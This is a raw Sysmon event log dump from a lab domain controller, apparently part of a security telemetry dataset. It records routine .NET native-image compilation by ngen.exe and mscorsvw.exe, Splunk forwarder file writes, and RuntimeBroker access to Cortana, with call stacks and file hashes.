21:06:50.577{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A26A-60D3-1005-00000000CF01}3752C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000022409Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:50.577{4DB9351A-A26A-60D3-0F05-00000000CF01}5848NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\OB0G31BQYF\System.Drawing.ni.dll.auxMD5=94D7302DE14F5BC21132AAB72344F55D,SHA256=C435218B6BC6FCA23400AC3B79586384E14A701303E26316A5DB4E3BEBC4C678,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000022408Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:50.577{4DB9351A-A26A-60D3-0F05-00000000CF01}5848NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\OB0G31BQYF\System.Drawing.ni.dllMD5=040BB2C65CB0EBE3C700E176C7829680,SHA256=BDD599E392F11FF594343BEB358A5732A2CB0C2C703CC0458E14F3ACFD727462,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000022407Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:50.483{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A26A-60D3-0F05-00000000CF01}5848C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022406Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:50.468{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A26A-60D3-0F05-00000000CF01}5848C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022405Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:50.468{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A26A-60D3-0F05-00000000CF01}5848C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000022404Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:50.468{4DB9351A-A26A-60D3-0E05-00000000CF01}5096NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\C8KAZE7YJ3\System.Configuration.ni.dll.auxMD5=A2EFEE5D60AD20F21CC1C7AF4F7B0283,SHA256=F952C1C062215AB5710805169548783F652AD66CD29F6AB95FB6E3B24FC96AB5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000022403Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:50.468{4DB9351A-A26A-60D3-0E05-00000000CF01}5096NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\C8KAZE7YJ3\System.Configuration.ni.dllMD5=A7AEC406B4A1D27E5B604FA1014D2615,SHA256=1A93DE657BC2DB27A9597B68E8B9749FD0C52FBF101B5B20C014D0E2A055D9A8,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000022402Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:50.405{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E106202512D9210A233A7C61966506B6,SHA256=4E89EAB0B1DE3EF1B564172CB1369DDD7FE115DDEC59A7E56458DE461575B8A6,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000022401Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:50.374{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A26A-60D3-0E05-00000000CF01}5096C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022400Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:50.343{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A26A-60D3-0E05-00000000CF01}5096C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022399Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:50.343{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A26A-60D3-0E05-00000000CF01}5096C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 11241100x800000000000000022398Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:06:50.249{4DB9351A-A26A-60D3-0D05-00000000CF01}5824C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\16c0-0\XsdBuildTask.dll2021-06-23 21:06:50.249 23542300x800000000000000022397Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:50.217{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=626AFAD9846CD4117BC96A1C4127B93E,SHA256=FF4FA84FFB6DB7497BFECAA6C56A2D8DB0C1A37FE35D7FD6596BAA7AE12976DB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000022396Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:50.134{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A26A-60D3-0D05-00000000CF01}5824C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022395Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:50.134{4DB9351A-9F2B-60D3-C400-00000000CF01}7765472C:\Windows\System32\RuntimeBroker.exe{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x800000000000000022394Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:50.134{4DB9351A-9F2B-60D3-C400-00000000CF01}7764780C:\Windows\System32\RuntimeBroker.exe{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x800000000000000022393Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:50.134{4DB9351A-9F2B-60D3-C400-00000000CF01}7765616C:\Windows\System32\RuntimeBroker.exe{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x800000000000000022392Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:50.134{4DB9351A-9F2B-60D3-C400-00000000CF01}7765472C:\Windows\System32\RuntimeBroker.exe{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde 10341000x800000000000000022391Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:50.134{4DB9351A-9F2B-60D3-C400-00000000CF01}7765616C:\Windows\System32\RuntimeBroker.exe{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde 10341000x800000000000000022390Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:50.134{4DB9351A-9F2B-60D3-C400-00000000CF01}7764780C:\Windows\System32\RuntimeBroker.exe{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde 10341000x800000000000000022389Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:50.118{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A26A-60D3-0D05-00000000CF01}5824C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022388Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:50.118{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A26A-60D3-0D05-00000000CF01}5824C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000022444Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:51.936{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A26B-60D3-1605-00000000CF01}2408C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022443Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:51.905{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A26B-60D3-1605-00000000CF01}2408C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022442Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:51.905{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A26B-60D3-1605-00000000CF01}2408C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\